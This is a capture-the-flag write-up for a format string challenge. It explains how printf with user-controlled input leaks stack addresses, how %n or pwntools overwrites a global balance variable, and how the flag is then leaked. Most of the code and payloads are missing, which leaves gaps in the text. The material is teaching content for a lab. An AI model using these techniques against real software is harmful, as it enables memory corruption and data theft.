Author: d1g174l_f0r7r355
This was one of the hard challenges I made for inctfj qualifiers. It is based on format strings. I will try to explain all the concepts required and used in this challenge.
Preliminary checks:
It is a 64 bit, dynamically linked, non-stripped binary.
For this challenge all protections are enabled and so the chances of any possible overflow or injecting shellcode is ruled out and we will have to find some other way to pwn it. The source code for the challenge was also given along with the challenge. To understand what the program is actually doing, let's first analyze the source in detail.
Source Code analysis:
Firstly, let us look into what main() is doing!
- The main() function takes a character input . Depending on our input the functions , and are called respecitively. Another thing to note is, it runs in an infinite while loop; meaning we can call each of these functions as many times as possible. Now let's analyze what happens when each of the functions are called as we give our input choice.
check_leaks():
Input choice in the main() function, calls for check_leaks(). What happens here and are there any vulnerabilities in this function? If so how can we exploit it? To answer the above questions, let's look at the function in the given source code. As we can see, from the above source code, cheak_leaks() prints out the balance in your account and asks you where you would like to check your leaks. Thereafter, fgets reads 100 bytes of user input into and simply prints out your leaks using . Now why is this a vulnerability? To understand that, let's dive into the concept of format strings!
Format Strings :
What are format strings?
If we look at the manual page of function in C, a format strings is defined as:
"The format string is a character string, beginning and ending in its initial shift state, if any. The format string is composed of zero or more directives: ordinary characters (not %), which are copied unchanged to the output stream; and conversion specifications, each of which results in fetching zero or more subsequent arguments. Each conversion specification is introduced by the character %, and ends with a conversion specifier."
So what does it mean?
Let's consider an example!
A more familiar widely used syntax while calling printf() looks something like this:
As we can see, the first parameter to printf() is a "%s" character implying that a character string should be printed out to screen as output. The second parameter is the the location or simply the variable where the string is stored in memory.
Here, "%s" is called as the format specifier as it determines what kind of conversion should be done on the subsequent arguments to produce a suitable output. (In this case, our suitable output is a character string.) What are the other format specifiers?
Some other very commonly used format specifiers are:
Similary :
Vulnerabilities?
Often in exploitation analysis, we have noticed that not all C-library functions are bug free and despite the protections and compiler warnings, it is always possible to overwrite some memory junk, and cause malicious behavior of the program.
too has vulnerabilities, that allow us to overwrite addresses and cause such malicious behavior. One example would be to make use of printf() to overwrite a certain with address.
As we know, printf() follows a default syntax where it accepts at least 2 parameters, (first one being a format specifier and the second being the location or a pointer). However it is seen that, where is a character array containing the string "hello_world!", will result in "hello_world!" being printed out to the screen. One may ask, despite the usual behavior, how is this a vulnerability. To understand more, let's consider a case where the argument to printf() is user controlled.
Example:
So what do we understand from the above three lines of code?
We see that, the user inputs data into and the same character array is passed as an argument to printf() without any format specifiers. Now suppose the user decides to give "%p" or a "%x" as his user buffer in the input stream, what do you think will be printed to the screen? Since the first argument given is a format specifier, the pointer value or the address of whatever is present on the top of the stack will be printed out. In case of a 64-bit system, since if the user decides to give "%p" as his inpBuf, it will print the pointer value in register "rsi" since the second argument will be stored "rsi" after the first argument ("%p") being stored in "rdi". Therefore, a user may decide to leak data from the stack by giving suitable offsets i.e "%4$p" will print the pointer value of the 4th offset on the stack. And this is how printf() is abused.
We will thus make use of the above vulnerability to obtain leaks from memory and also write to memory in a similar manner. This will be discussed in the exploitation part of this writeup.
call_plumber():
Input choice in the main() function, calls for call_plumber(). This function however may not be of much significance to us as it simply prints "Why must you call the plumber when you can fix the leak yourself?". Moving on!
buy_repair_kit():
Input choice in the main() function, calls for . This function is quite interesting as firstly it checks if . If the condition is satisfied it will call . Else it simply prints "You do not have enough balance! :(". If we look at the global variable , we can see that it is initialized to , whereas in order to pass the check. Which means we need to find a way to overwrite variable with so that use_tapes() will be called. We will see more of this in the exploitation section of the writeup. For now let's continue with understanding the source code.
use_tapes():
This function is only called by once the condition is satisfied. However we do find that use_tapes() asks for our experience and prints our experience using . Another thing to notice in this function is that the flag is read from into the variable however it is not printed out. Luckily for us, we observe just another format string vulnerability here, i.e . Since we have understood how printf() can be used to leak data from memory, we will use the same concept here to leak the flag!
Exploitation:
Now that we have understood the binary and a few other concepts related to the challenge, our logic for exploitation is pretty simple:
- call the function to obtain the address leak for the global variable with the help of the format string vullnerability.
- call the function again to change the value in the global variable from 100 to 200.
- call the function , pass the check so that the function is called.
- Once is called, make use of the format string vulnerability to simply leak the flag! Let's begin the exploit by going through each of the above four steps.
Leaking the address of the global variable "bal":
This might seem a bit tricky and confusing at first, but once we start to analyse and dig in deeper, it will become more and more clearer. We will be leaking the address of bal from the function. Thus let us assume our payload to be something of this sort:
With this payload, our output is:
Upon noticing closely, the value at the 6th offset i.e is nothing but our input string . We find many other addresses such libc or code addresses. We are however interested in the the address leaked at the 18th offset i.e . Why this address? Well first off wherever our global variable is stored in memory, its offset from the address won't change! Not just the , but from any given code address, the offset always remains constant! The address of the global variable can be found using the command in gdb (Or one can simply use ida/ ghidra for finding the address). As we can see:
The address of the global variable is . Since the offset of the global variable remains constant from code_base or any code address for that matter, we can make use of the leak obtained at the 18th offset above, ie , to find the address of . How? Find the offset of the variable from the leaked stack address, add the offset to the leaked stack address. You may also see how it's actually calculated!
As we can see, the global variable is present at an offset of 0x2ab0 above the obtained stack leak address.
And so we have have obtained the address for the variable i.e
Overwriting the value of from 100 to 200:
Now that we have obtained the address for the global variable , our task is to overwrite it with . Since there are no other vulnerabilities in the program, we will have to look for a way to overwrite using format strings only. Thus we will call the function again, this time to write to memory. This can be done in 2 ways:
- Using in pwntools.
- While we make use of the above built in function in pwntools, we must note that the offset we give is equal to 6, as we saw above, our input string was found at offset 6. The address we give here is the address of the global variable bal, and the value to give is 200 since that is what we are going to overwrite it with. Thus our payload is something like:
- Using format specifier.
- This could be a bit tricky as it requires for us to understand the concept. prints nothing, instead stores the number of characters printed onto the screen to the given variable. So what does this mean? Let's consider an example:
Output obtained is: . Why? That's because the number of characters printed before is 13. We shall use a similar concept to write to memory.
While writing to memory, we must keep a few things in mind, the offset, the address and the value to overwrite it with. Our offset being 6, adress being that of the recently obtained global variable bal and the value to overwrite it being 200. Our payload will look something like this:
Here is how it looks like in memory!

Thus we see that the address of bal is present at the 8th offset. Another way to calculate would be: , where is where address of bal is written, is where our input string is stored, all on the stack. Once we overwrite we can check the value now stored in to verify.
Obtain the flag:
Now that we have leaked and written to memory, once the check passes, will be called where our next task is to simply leak the flag. Similar to as shown above we can either use '%s' or a '%p' format specifier to leak the flag string. If we are making use of '%p' to leak, we need to be use of converting from hex to string! To find the offset let's give a string of '%p' and see where the flag could be on the stack! . Output:
Thus we can find our input string at the 8th offset or if we look closely, we can find that value leaked at the 16th offset is nothing but our flag! Thus to just leak the flag, our payload can be, , while running on the server.
